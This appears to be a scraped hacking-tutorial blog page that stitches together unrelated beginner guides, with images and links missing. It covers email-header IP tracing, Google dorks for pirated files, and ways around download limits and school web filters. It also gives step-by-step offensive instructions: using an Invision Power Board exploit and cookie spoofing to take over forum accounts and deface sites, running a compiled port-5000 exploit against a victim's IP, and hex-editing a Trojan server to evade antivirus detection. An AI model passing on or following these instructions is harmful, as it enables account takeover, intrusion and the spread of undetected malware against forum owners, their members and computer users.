* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding I.P Address In Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is []. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is []. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have
9. Track the IP address of the sender

find FTPs using google

How to find FTPs using google

How To Find Ftp's The Easy Way'

I use google because its the best search engine en everyone can access .
The easiest search quote is "index of ..."
Some kind of examples are:

index of ftp/ +mp3
index of ftp/ +divx
index of ftp/ +"whateveryouwant"

Google has many operators that should help you to specify your search
There are also lots of advanced operators available
here are a few:


allintitle: "index of ftp/mp3"

try to combine things and maybe u'll find something

Really useful stuff for those who don't know how to use one of the most powerful search engine

How to Defaced a Website

How to Defaced a Website

Reminder: This site never encourage anybody to hack.. As we all know that Hacking is Illegal.. I share this tuts only for education purposes only..
Simple defacing tutorial for beginners.
Oh and before I start to all you 1337 people that think they know everything
Please don’t post saying sum stupid **** like “this **** if for noobs” blablabla.
Its supposed to be for noobs.

First your going to need any nice cookie editor.
I just use opera because it’s the fastest way.

Opera Web Browser(Possibility to edit cookies):

When you have downloaded and installed opera continue.

Lets start by some quick explanation what were going to do is use a simple ipb exploit to get any members hash code then were are going to log in using a method called cookie spoofing
With the exploit you can do many other stuff like get a members ip address, email, username.. etc.

The exploit were going to use woks on Invision Power boards 2.1.6 and any lower version.
Preferably 2.1.5 or 2.1.4.

First you will need perl installed:
Then Download My exploit package:

Ok when you have perl installed open my package.
Extract it anywhere you want. (exemple desktop) if you don’t have winrar just search on google.
Open the file you should see this:

Double Click on the file “Ipb Exploit fkn0wned”

How to Defaced a Website - Shaify Mehta

this is the gui for the exploit you will be using this to find the hash or info of the target.

Actual Defacing:
Ok now were onto the actual fun part !
Open opera browser.
Ok now we need to find a vulnerable forum, finding those some times aren’t that easy.
Go to and type in one of those(these are google dorks[vulnerable forums]):

Powered by invision power board v2.1.4
Powered by invision power board v2.1.5
Powered by invision power board v2.1.6
Powered by invision power board v2.1.3

We need to find out if its really vulnerable or unvulnerable, to do this you must first find a forum with the following:

How to Defaced a Website - Shaify Mehta
How to Defaced a Website - Shaify Mehta
When you have found a vulnerable forum its time to find the hash.

Put the forum url in the gui if that’s not already done.
Change the User_id to whatever member. To see member id’s click on a username and in the internet link it should show exemple: number 3 would be James’s (X0G) member id. (but use this on the vulnerable forum) **This will not work on Blackbay ROFL.


When you have entered User_id make sure the options are set to like this:

if everything is good click “Get date from database”
a hash should pop up where it says “Returned date:” (note: you cant crack this hash you can only cookie spoof all the hash’s will be salted)

Now you have the hash ! now whats left to do is to login in with admin or whatever user you choose.

First go to your vulnerable website and register enter all the information needed preferably not entering real info. ( if your not a retard )

Set a random username like : plorlt
set an email like: ( it doesn’t have to be real I have a way of getting it without doing the email verify)

when it says an email has been sent to blabla just go back to the forum index and login.
When your in go to tools>advanced>cookies… now you need to find the vulnerable sites cookie you need to be logged in !
When you get to that cookie simple open the file and edit the Hash with the one you got with the exploit, and edit the member_id to whichever one you use to get the hash.

Then delete everything else in the cookie only member_id and hash is needed.

Click ok and refresh the page you should be logged in as your target ! 

compile exploits using cygwin

How to compile exploits using cygwin

|| Guide: How to compile Exploits ||

Exploit is a code built in C, VB etc.. that takes advantage of an open port.
This guide will teach you how to compile an exploit in cygwin.

In the following steps i'll show you how to compile an exploit using a port 5000 exploit, but you can do the same for other ports just download their exploit from:


(Search the exploit as: "Exploit for PORT NUMBER")

STEP 1: Download port 5000 exploit, usually the exploits come as .txt and you need to change them to .c


After downloading and extracting the port 5000 Exploit we need to compile it (covert it to .exe), In order to compile the exploit we need the "Cygwin" program.


STEP 2: Open the Cygwin setup.exe and install it by the following pictures:










STEP 3: After installing the program we need to compile the exploit, place the 5000.c exploit in C:\cygwin\bin
then run the command line from - Start - Run - cmd/command
in the command window type:

CD c:\cygwin\bin
gcc 5000.c -o 5000.exe

(CD = Open)

Or follow by the picture:


STEP 4: After we finshed to compiled the exploit we can use it! =)
in order to connect the the victims computer that has port 5000 open in this case..
Open the command line by - Start - Run
then type:

CD c:\cygwin\bin
5000.exe XXX.XXX.XXX.XXX -e

(XXX.XXX.XXX.XXX = Victim's IP address)

Or follow by the picture:


and WALLA! your connected..

For C and C++ under windows use Bloodshed or another windows compiler. For C under linux use gcc. gcc -o exploit.c exploit For perl for windows go download active perl and usage is: perl For perl under linux use: perl For .sh under linux use: source

bypass Megaupload Slot Limit for your Country

How to bypass Megaupload Slot Limit for your Country

For some countries Megaupload will have a limit for the slots and you won't be able to download the file without a premium account that way .

Here's a trick to bypass that limit . In mozilla firefox , just use an extension which can be downloaded here :


After installing this extension , Restart your browser .

Go to Tools -> Megaupload3 -> Enable

Then use your megaupload link to download the file .

For some countries Megaupload will have a limit for the slots and you won't be able to download the file without a premium account that way .

Here's a trick to bypass that limit . In mozilla firefox , just use an extension which can be downloaded here :


After installing this extension , Restart your browser .

Go to Tools -> Megaupload3 -> Enable

Then use your megaupload link to download the file .

How to access blocked sites at school

How to access blocked sites at school

1st Method

I was screwing around with the command prompt one day in school, and realized I could access blocked sites, I decided to share because I like you guys.

1. Start>Run and type in cmd, if you don't have run on your start menu, read another school hacking tutorial to tell you how to access it.

2. Once your command prompt box opens, type "ping" (of course without the quotes.)

3.Press enter and you should see some numbers that looks like an IP address pop up, copy those numbers.

4. Open up your school internet browser, and type in those numbers that you copied in the command prompt. Now you can access your website!

2nd Method

Hexing Tutorial for Beginners-Making UD server

Hexing Tutorial for Beginners-Making UD server

Hello people. Since I had many people asking me how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
__________________________________________________ ___________________
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server heuristics, sandboxing, etc., and one of them is using so called "definition files"
that carry information about strings inside your server. Well, that�s the way we�re
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific stings on specific parts
in your server, and if strings match with strings in the AV database, your file is
Let�s say that detected strings are "XX" so we need to change that string to something
else (e.g. "XY","YY") that isn�t in the AV definition database so the file can�t be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server - not only one, depending on
what trojan you�re using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts - this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
That�s why you need to check your server if it�s still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding 00�s to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters like UKSplitter that are going to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset finder like AV Devil.
2. What tools we need.
- Unpacked trojan server.
(your favorite trojan server)
- Hex editor.
(I will use Hex WorkShop, you can find it at
- Offset finder
(AVDevil, you can find it at
3. How to hex:
-Step 1.
Turn your AV real-time protection �OFF� . Make your Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server msg will pop up
click OK, and the next msg will popup asking you to turn your AV real-time
protection back �ON�. After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click on "Skip" and let
AV Devil finish.
After its done you will see something like this:

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at 5476.
Also you can see where the second offset starts and ends. That�s the part that the AV
is checking in this definition database. If the part in the server matches with part in
AV database your server is detected. You can hex beginning and ending offset or in
Step 2.
Now when we have detected offsets, we open our server in Hex WorkShop. Type
"Ctrl+G" and this will come up:

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Type the first offset in, select from �Beginning of File,� and make sure that you
selected "hex," because offsets in AV Devil are displayed in that manner. Unless you
save via AV Devil, then they are converted into a decimal. Click �Go� and you will
be sent to that offset location. Now we need to change that �31� to something else, so
we will change it to �32�.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Select �31� right click to it and select fill.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

You will see the window below. In �Fill with the following hex byte� we are going to
fill in �32� and hit OK.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

After clicking �OK,� the changed hex byte going to be shown in red.

__________________________________________________ __________________
Now repeat this for every offset that you found in AV Devil.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta
__________________________________________________ ___________________
Going to change it �FE� to �EE� and so on for all other detected offsets.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Once you�ve completed editing all offsets, save your server and scan if it�s UD, and
then you�re done. If the AV still detecting it, repeat steps 1 and 2.
Here�s a little tip on how to change detected bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one character up/down
for each - that�s the best way and will minimize chances to corrupt your server. If that
doesn�t work for some reason, you can try and change it to something completely
different, but always check your server after editing bytes. That way you can see if the
server works or if it�s corrupted (you can keep track of what change caused the
corruption and you can try and edit that byte with some other character).
Another thing in some Trojans servers is that AV Devil can�t find the beginning of the
first offset and will mark it with �0.� Let�s say you�ve hexed all other found offsets
but your server is still detected. Split the file into half and run AV Devil on the first
half. That way you will be able to find the first offset that is missing and finish your
hexing. If some tagged part is a letter, e.g. �Y� change it to �y� or just PlAy wItH
ThE CaPs.
Hexing Tutorial for Beginners-Making UD server - Shaify Mehta
Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

So there you have it! Now you know how to hex your server and make it undetected
from wanted AVs.

Blog Archive